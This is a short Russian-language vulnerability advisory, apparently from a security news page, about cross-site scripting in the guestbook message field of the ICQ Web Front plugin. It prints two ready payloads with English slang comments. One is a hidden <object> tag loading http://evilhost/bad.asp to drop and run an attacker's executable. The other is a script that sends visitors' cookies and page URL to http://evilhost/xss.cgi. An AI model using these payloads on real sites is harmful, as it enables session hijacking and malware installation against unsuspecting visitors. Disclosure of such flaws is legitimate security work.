Программа: ICQ Web Front plugin для ICQ 200x 

Уязвимость обнаружена в ICQ Web Front. Удаленный пользовать может
выполнить XSS нападение. Сценарий http://[host]/guestbook.html не фильтрует данные, представленные
пользователем в поле message. В результате удаленный атакующий может
выполнить XSS нападение против пользователей, посетивших ICQ Web
Front. 

<object style="display:none" data="http://evilhost/bad.asp"> 
</object> 
dropping and executing a .exe of the attackers choice 
on vunerable browsers ala eeye or malware's mad <object> teknikz 
who says you cant root via the XSS !!! 

или

<SCRIPT>location.href="http://evilhost/xss.cgi?ref=
"+document.URL+"cookie="+ 
docu 
ment.cookie;</script> 
cookie grabbin'

Оставить мнение